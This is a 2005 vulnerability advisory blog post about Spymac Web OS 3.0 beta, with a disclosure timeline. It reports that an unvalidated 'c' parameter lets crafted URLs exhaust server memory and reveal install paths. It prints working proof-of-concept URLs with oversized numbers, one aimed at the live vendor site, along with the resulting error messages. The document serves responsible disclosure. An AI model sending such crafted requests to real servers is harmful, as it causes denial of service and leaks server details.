Spymac Web os 3.0 Abuse server´s memory and path disclose

Saturday, May 14, 2005
#########################################################
Spymac Web os 3.0 Abuse server´s memory and path disclose
vendor url:http://www.spymac.com/network.php?p=webos&wwg=20
Vendor notified : yes exploit avaible : yes
Original advisore:http://lostmon.blogspot.com/2005/05/
spymac-web-os-30-abuse-servers-memory.html
vendor notfy: yes exploit available : yes
########################################################

Spymac is powered by an integrated collection of applications
(developed in-house)that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.


This flaw exists because the application does not validate 'c'
parameter upon submission to script.This could allow a user
to create a specially crafted URL that would consume all
memory on the server and reveals the path instalation of the
aplication,leading to a Denial Of Service and lost of integrity.

###############
versions
################

Spymac Webos 3.0 beta 190

################
solution
################

no solution at this time.

###############
timeline
###############

discovered: 11 april 2005
vendor notify: 12 april 2005
vendor response: none
Disclosure on Spymac bug forum :12 april 2005
Public disclosure: 14 may 2005


############################################
Full path disclosure and abuse of the memory
############################################

http://www.spymac.com/forums/showthread.php?threadid=134134&c=
900000000000000000000000000000

Fatal error: Maximum execution time of 120 seconds exceeded in /var/www/[victim]/classes/global_class.inc on line 770

--

with negative number:

http://[victim]/forums/showthread.php?threadid=134134&c=
-900000000000000000000000000000

Fatal error: Allowed memory size of 67108864 bytes exhausted
(tried to allocate 3840 bytes) in
/var/www/[victim]/classes/global_class.inc(201) :
regexp code on line 1

################### End #######################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...